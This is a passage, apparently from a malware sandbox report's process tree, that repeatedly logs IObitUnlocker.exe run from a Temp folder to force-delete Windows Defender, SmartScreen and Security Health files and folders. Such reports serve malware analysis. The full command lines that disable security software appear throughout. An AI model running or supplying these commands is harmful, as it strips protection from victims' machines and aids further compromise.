Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 